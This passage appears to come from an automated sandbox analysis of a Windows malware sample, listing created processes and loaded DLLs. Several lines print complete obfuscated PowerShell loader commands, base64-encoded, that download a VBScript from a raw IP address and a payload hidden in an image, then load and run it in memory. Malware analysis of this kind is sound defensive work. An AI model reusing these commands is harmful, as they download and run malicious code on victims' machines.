ICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
